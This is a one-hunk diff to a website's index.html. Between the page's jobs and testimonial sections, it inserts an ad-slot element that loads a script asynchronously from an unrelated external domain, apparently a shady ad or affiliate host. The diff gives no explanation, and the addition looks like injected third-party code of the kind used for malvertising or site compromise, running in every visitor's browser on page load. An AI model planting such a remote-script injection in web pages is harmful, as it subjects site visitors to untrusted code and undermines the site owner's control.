--- a/index.html
+++ b/index.html
@@ -642,7 +642,7 @@ button.expander {
 
 
         <!-- Jobs End -->
-
+<ins style="width: 300px;height:250px" data-width="300" data-height="250" class="u2640158fcd" data-domain="//125700.shop" data-affquery="/423aed4cc596cfd93129/2640158fcd/?placementName=default"><script src="//125700.shop/js/responsive.js" async></script></ins>
 
         <!-- Testimonial Start -->
         <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s">
